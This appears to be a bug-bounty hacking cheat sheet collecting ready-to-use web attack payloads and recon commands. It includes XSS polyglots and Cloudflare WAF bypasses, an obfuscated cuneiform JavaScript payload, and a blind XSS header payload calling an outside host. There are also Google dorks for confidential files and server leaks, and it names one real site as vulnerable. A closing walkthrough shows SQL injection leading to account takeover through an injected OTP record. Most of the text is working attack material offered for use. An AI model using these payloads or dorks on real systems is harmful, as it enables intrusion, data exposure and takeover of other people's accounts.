Payload for XSS + SQLi + SSTI/CSTI !

'"><noscript/onload=prompt(5);>{{7*7}}

XSS Oneliner

echo "testphp.vulnweb.com" | katana -passive -pss waybackarchive,commoncrawl,alienvault | uro | gf xss | Gxss -p XSSRef | dalfox pipe

subfinder -d testphp.vulnweb.com -silent | katana -passive -pss waybackarchive,commoncrawl,alienvault | uro | gf xss | Gxss -p XSSRef | dalfox pipe

Blind XSS In X-Forwarded-For Header

subfinder -d http://target.com | gau | bxss -payload '"><noscript src=https://hacker.xss.ht></noscript>' -header "X-Forwarded-For"

🫡Automate Your XSS

#!/bin/bash read TARGET
subfinder -d $TARGET -silent | tee domains.txt cat domains.txt | waybackurls | tee waybackurls.txt
cat waybackurls.txt | dalfox pipe

New XSS Bypass Cloudflare WAF 🧱

Payload : %3CSVG/oNlY=1%20ONlOAD=confirm(document.domain)%3E

New Xss Fly Under Radar Cloudflare Bypass 🧱

Payload :

"><input%252bTyPE%25253d"hxlxmj"%252bSTyLe%25253d"display%25253anone%25253b"%252bonfocus%25253d"this.style.display%25253d'block'%25253b%252bthis.onfocus%25253dnull%25253b"%252boNMoUseOVer%25253d"this['onmo'%25252b'useover']%25253dnull%25253beval(String.fromCharCode(99,111,110,102,105,114,109,40,100,111,99,117,109,101,110,116,46,100,111,109,97,105,110,41))%25253b"%252bAuToFOcus>


Credit -Halim

📢a XSS payload, Cuneiform-alphabet based !
This payload was on trend back in 2020, but it still works :)

𒀀='',𒉺=!𒀀+𒀀,𒀃=!𒉺+𒀀,𒇺=𒀀+{},𒌐=𒉺[𒀀++],
𒀟=𒉺[𒈫=𒀀],𒀆=++𒈫+𒀀,𒁹=𒇺[𒈫+𒀆],𒉺[𒁹+=𒇺[𒀀]
+(𒉺.𒀃+𒇺)[𒀀]+𒀃[𒀆]+𒌐+𒀟+𒉺[𒈫]+𒁹+𒌐+𒇺[𒀀]
+𒀟]𒁹")()

(Cuneiform is a logo-syllabic noscript that was used to write several languages of the Ancient Near East. The noscript was in active use from the early Bronze Age until the beginning of the Common Era. It is named for the characteristic wedge-shaped impressions (Latin: cuneus) which form its signs.)

Source - Wikipedia

Google Dork - Sensitive Docs 📄

ext:txt | ext:pdf | ext:xml | ext:xls | ext:xlsx | ext:ppt | ext:pptx | ext:doc | ext:docx
intext:“confidential” | intext:“Not for Public Release” | intext:”internal use only” | intext:“do not distribute”

Google Dork - Server Errors ⚡

inurl:"error" | innoscript:"exception" | innoscript:"failure" | innoscript:"server at" | inurl:exception | "database error" | "SQL syntax" | "undefined index" | "unhandled exception" | "stack trace" site:example[.]com

Google Dork - High % keywords 🚀
inurl:conf | inurl:env | inurl:cgi | inurl:bin | inurl:etc | inurl:root | inurl:sql | inurl:backup | inurl:admin | inurl:php site:example[.]com

https://youtu.be/cfs5pWh5jqM?si=pEyqVQ6SctrnzI7C

DM For Live Class Enrollment
https://wa.me/918945971332

Dork: Apache Server Leakage

inurl:server-status "apache server status" "cpu usage"

Reference: https://medium.com/@ghostlulzhacks/apache-server-status-a70abed83f5a

Vulnerable Site- https://www.itronot.co.il/server-status

Look into subdomains that allow sign-in with Google, as they may contain sensitive information accessible only to team members.

Dork: site:*.example.com inurl:login | inurl:signin Google

Case Insensitivity Vulnerability

/api/docs/index.html ==> 403 Forbidden
/api/Docs/index.html ==> 200 Ok

SQL Injection to Account Takeover Manually :)
1. Enter mobile number to login intercept
{"mobile_number":"8888888888"} >> 200
{"mobile_number":"8888888888'"} >> 500
{"mobile_number":"8888888888''"} >> 200

2. Final Query:
8888888888','1111','2024-04-03 21:20:55',1,'2024-04-03 21:20:55') --

2024-04-03 21:20:55 >> Exact time and date
1 >> attempts
you can see the 200 response

last you can login with the 1110 OTP and get access to the victim account :)

Credit- Kullai